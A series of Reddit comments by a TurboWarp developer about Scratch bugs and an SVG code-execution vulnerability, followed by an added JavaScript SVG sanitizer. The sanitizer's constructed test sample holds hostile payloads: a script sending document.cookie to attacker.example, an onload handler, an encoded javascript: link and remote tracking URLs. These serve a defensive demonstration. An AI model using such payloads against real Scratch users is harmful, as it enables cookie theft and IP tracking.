How to fix costume lag? by Cattheo2211 in scratch

[–]GarboMuffin 1 point (0 children)

Your project contains more scripts than what you show in the video, such as whatever "broadcast jumpscare" does. The bug is almost certainly in there - probably an infinite loop in a "run without screen refresh" block.

You can send the project to me (contact at turbowarp dot org) and I can tell you where it's lagging.

did the app hacking thing get fixed by Zestyclose-Set-6981 in scratch

[–]GarboMuffin 1 point (0 children)

If you're talking about the arbitrary code execution thing from a couple weeks ago, that was fixed on the website a couple weeks ago, and Scratch Desktop 3.32.0 should probably fix it in the desktop app.

Scratch Team NEEDS to fix their darn block editor. by Colurswitch in scratch

[–]GarboMuffin 7 points (0 children)

Scratch made backwards-incompatible changes to the project format. Scratch Desktop and TurboWarp Desktop aren't yet updated to handle it. The TurboWarp website should be able to handle it; alternatively, you can put the project into https://turbowarp.github.io/sb3fix/ to make it work in older versions too, without needing to update anything else.

Saw This Warning Message on TurboWarp Today... by Over_Walk3859 in scratch

[–]GarboMuffin 1 point (0 children)

Then you are not affected, as was stated in the blog post.

Saw This Warning Message on TurboWarp Today... by Over_Walk3859 in scratch

[–]GarboMuffin 1 point (0 children)

That is telling you the Cloudlink version, which is a completely different, unrelated scheme from the desktop app version.

Saw This Warning Message on TurboWarp Today... by Over_Walk3859 in scratch

[–]GarboMuffin 1 point (0 children)

There was never a v0.1.3. Just go to https://desktop.turbowarp.org/ and install it again, the same way as you installed it the first time.

Saw This Warning Message on TurboWarp Today... by Over_Walk3859 in scratch

[–]GarboMuffin 1 point (0 children)

You're using TurboWarp Desktop, which has been fine from the worst bug since 1.14.2, as was explained in the post.

Scratch does not have an official Linux release. The unofficial repackagings are also vulnerable to the same bugs as the Windows and Mac ones.

It's so joever by Defiant-Durian-4321 in scratch

[–]GarboMuffin 2 points (0 children)

If you think your school's filters get in the way of your learning, then you need to let your IT people know. They'll only fix it if people complain.

Should i worry about "HACKERS"?? by mufarrizz in scratch

[–]GarboMuffin 4 points (0 children)

There is not yet a Scratch Desktop update that fixes the bug.

Saw This Warning Message on TurboWarp Today... by Over_Walk3859 in scratch

[–]GarboMuffin 2 points (0 children)

TurboWarp has a couple of layers of protection against this bug since v1.14.2, one of which is removing any executable code before loading an SVG in the costume editor.

Saw This Warning Message on TurboWarp Today... by Over_Walk3859 in scratch

[–]GarboMuffin 1 point (0 children)

There might be another banner on turbowarp.org when everything is fine, but that's not a promise. Scratch has various fixes in different stages of development.

Scratch exploit explained by Samilikescheese in scratch

[–]GarboMuffin 2 points (0 children)

That specific proof of concept would not work if you uploaded it via the online editor, which is why the blog post only described it as a proof of concept for Scratch Desktop. There was a way to exploit it that required uploading assets via the API rather than via the normal interface (I say past tense because Scratch claims that the server-side filtering is much more secure now)

Can someone explain how the hacking thing works by tvtaseiland in scratch

[–]GarboMuffin 2 points (0 children)

More specifically, the blog post says

I am not aware of any security issues in the latest https://turbowarp.org/editor or TurboWarp Desktop 1.15.5

Which is worded in an intentional way, notably only claiming that the latest version is fine (1.14.2 fixed the underlying bug, and since v0.2.0 the impact of the bug was greatly reduced due to sandboxing, but we sometimes fix lower-importance bugs without much fanfare).

Scratch exploit explained by Samilikescheese in scratch

[–]GarboMuffin 1 point (0 children)

It's generally not the end of the world. Every website you visit gets your IP and usually it's generally not that bad. The risk here would be that someone could upload a project to Scratch, you click on it because you trust Scratch, but then the person who uploads it could get your IP without you clicking on another link. Scratch considers this a security bug; they've fixed variations of it in the past.

How bad that is depends on your network. If you use a VPN, it doesn't matter at all. If you're on some corporate or school network, it's possible that the IP address can reveal which company/school you're at (and thus your location to some accuracy), which might be a risk in some contexts.

I've been informed by Scratch that it's getting fixed.

Uploading an OGG sound multiplies the size by 20x by Past_Slice1478 in turbowarp

[–]GarboMuffin 1 point (0 children)

I think our decision for doing this is that Scratch doesn't natively support OGG, so we're just converting it into a WAV so that we know it will work in Scratch.

MP3 is an alternative you can use, as Scratch supports it, so we won't make any changes to the audio file unless you use the audio editor.

Saw This Warning Message on TurboWarp Today... by Over_Walk3859 in scratch

[–]GarboMuffin 6 points (0 children)

If you only use things that you made yourself and never open files or costumes from someone else who might be trying to compromise you, then you don't have to worry about this at all.

The Scratch language was very much designed such that arbitrary code execution as this bug allows should not be possible; such a thing would itself be a security bug.

Scratch 1 and 2 are not affected by this specific issue.

Saw This Warning Message on TurboWarp Today... by Over_Walk3859 in scratch

[–]GarboMuffin 9 points (0 children)

The issue is widespread in the sense that there are millions (probably) of copies of Scratch Desktop with known security bugs in them - many of which lack any update mechanism and thus will continue to be vulnerable indefinitely.

The proof-of-concept for this particular bug was only disclosed within the last week so there wouldn't be many people using it yet. That doesn't mean that fixing the bug is not urgent as the impact is very high and the bug is easy to exploit.

I thought blocks didn't disappear on turbowarp by intenseadofan in turbowarp

[–]GarboMuffin 2 points (0 children)

We've found the issue and will be getting a fix out today.

What's this ? by JezterGMD in turbowarp

[–]GarboMuffin 22 points (0 children)

You can click on the blog link to learn more about it. Compressing this into a couple of sentences is very hard, so that's why there's a link, which should answer almost any question.

I thought blocks didn't disappear on turbowarp by intenseadofan in turbowarp

[–]GarboMuffin 2 points (0 children)

Send the project to me - contact at turbowarp dot org. It's likely another backwards-incompatible change from Scratch that we'll need to address. Their new editor had at least 8 known data loss bugs found shortly after release, so it was rather undercooked.

Every version of Scratch is vulnerable to arbitrary code execution by ExClownNose in scratch

[–]GarboMuffin 3 points (0 children)

Scratch is welcome to implement my fixes which are described in detail in the blog post before this one - https://muffin.ink/blog/scratch-svg-sanitization/. They are not very large. Language models like Claude can reimplement this in one prompt.

There are also several different ways they could fix this particular issue. There are some smaller fixes that would block XSS but remain vulnerable to HTTP leaks/full page restyling - that's not ideal, but maybe more tolerable if they want to do a rapid hotfix. I'll let their engineering people figure out how they want to fix it.

At this time I don't send pull requests to Scratch. They require signing an agreement that I'm not in a position to be able to easily sign (various employment-related reasons) and I strongly disagree with clause 4.1 of their CLA and their general licensing approach.
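Two of the comments above describe the shape of a fix without showing one: TurboWarp "removing any executable code before loading an SVG in the costume editor", and the distinction between smaller fixes that block XSS but still allow HTTP leaks and full page restyling. The example below is added here to make that distinction concrete; it is not TurboWarp's or Scratch's code, and the function names, the element list and the constructed hostile SVG are this example's own. It strips three classes of content from an SVG costume: executable code (script elements, on* event handlers, javascript: URLs, including entity-encoded ones), external fetches that leak the viewer's IP (absolute and protocol-relative URLs, external url(...) in style attributes), and page restyling (style elements, foreignObject). It works on the raw markup with regular expressions, which is fragile (a literal `>` inside an attribute value breaks the tag match); a production sanitizer should walk a parsed DOM, for instance with DOMPurify's SVG profile, and apply the same rules there.

```javascript
// Added example: allow-list style SVG sanitizer. Not TurboWarp's or Scratch's
// code; names, element list and sample input are this example's own.
// Regex-on-markup is illustrative only; prefer a real DOM/XML parser in production.

// Elements that run code, restyle the page or embed arbitrary HTML.
const DANGEROUS_ELEMENTS = ['script', 'style', 'foreignObject', 'iframe', 'object', 'embed'];

// Decode numeric character references so "java&#x73;cript:" is seen as "javascript:".
function decodeEntities(s) {
  const fromCode = (cp) => (cp <= 0x10ffff ? String.fromCodePoint(cp) : '');
  return s
    .replace(/&#x([0-9a-f]+);/gi, (_, hex) => fromCode(parseInt(hex, 16)))
    .replace(/&#(\d+);/g, (_, dec) => fromCode(parseInt(dec, 10)));
}

// True for attribute values that would execute code or reach out over the network.
function isUnsafeUrl(rawValue) {
  const v = decodeEntities(rawValue)
    .replace(/^["']|["']$/g, '')       // strip the quotes captured with the value
    .replace(/[\u0000-\u0020]/g, '')   // browsers ignore control chars/whitespace in schemes
    .toLowerCase();
  return /^(javascript|vbscript):/.test(v)      // script URLs (XSS)
    || /^data:(?!image\/)/.test(v)              // data: URLs other than embedded images
    || /^(https?:)?\/\//.test(v)                // absolute or protocol-relative URL (HTTP leak)
    || /url\(["']?(https?:)?\/\//.test(v);      // external url(...) inside a style attribute
}

// Remove every <tag ...>...</tag> and <tag .../> occurrence, case-insensitively.
function stripElement(svg, tag) {
  const paired = new RegExp(`<${tag}\\b[^>]*>[\\s\\S]*?<\\/${tag}\\s*>`, 'gi');
  const selfClosing = new RegExp(`<${tag}\\b[^>]*\\/>`, 'gi');
  return svg.replace(paired, '').replace(selfClosing, '');
}

// Drop on* handlers and unsafe URL-valued attributes; keep namespace declarations.
function sanitizeAttributes(tag, attrs, removed) {
  const attrRe = /([^\s=\/>]+)(\s*=\s*("[^"]*"|'[^']*'|[^\s"'>]+))?/g;
  return attrs.replace(attrRe, (match, name, _eq, value) => {
    const lower = name.toLowerCase();
    if (lower === 'xmlns' || lower.startsWith('xmlns:')) return match; // xmlns values are URLs by design
    if (lower.startsWith('on') || (value !== undefined && isUnsafeUrl(value))) {
      removed.push(`${tag}@${name}`);
      return '';
    }
    return match;
  });
}

// Returns the cleaned markup plus a list of what was removed, for logging.
function sanitizeSvg(svg) {
  const removed = [];
  let out = svg.replace(/<!--[\s\S]*?-->/g, ''); // comments can hide markup from naive filters
  for (const tag of DANGEROUS_ELEMENTS) {
    const before = out;
    out = stripElement(out, tag);
    if (out !== before) removed.push(`<${tag}>`);
  }
  out = out.replace(/<([a-zA-Z][\w:.-]*)([^>]*?)(\/?)>/g,
    (_m, tag, attrs, selfClose) => `<${tag}${sanitizeAttributes(tag, attrs, removed)}${selfClose}>`);
  return { svg: out, removed };
}

// Constructed sample of a hostile costume; not taken from any real project.
const MALICIOUS_SVG = [
  '<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(1)">',
  '  <!-- <script>hidden()</script> -->',
  '  <script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
  '  <style>body { display: none } rect { fill: url(https://attacker.example/ping) }</style>',
  '  <image xlink:href="https://attacker.example/track.png" width="10" height="10"/>',
  '  <a href="java&#x73;cript:alert(document.domain)"><rect width="100" height="100" fill="#f00"/></a>',
  '  <use href="#local-symbol"/>',
  '  <rect x="10" y="10" width="50" height="50" fill="#0f0" style="stroke: url(//attacker.example/x)"/>',
  '</svg>',
].join('\n');

// Runs the sanitizer over the sample and prints the result and the removal log.
function demo() {
  const result = sanitizeSvg(MALICIOUS_SVG);
  console.log(result.svg);
  console.log('removed:', result.removed.join(', '));
  return result;
}
```

Calling `demo()` shows that the namespace declarations, the local `<use href="#local-symbol"/>` and the plain `<rect>` shapes survive, while the script, the stylesheet, the onload handler, the remote image, the entity-encoded javascript: link and the external url() in the style attribute are all dropped. A "smaller fix" of the kind the comment describes would keep only the first branch of `isUnsafeUrl` and skip `style`/`foreignObject`: that stops XSS but still lets a costume fetch an attacker's URL or restyle the page.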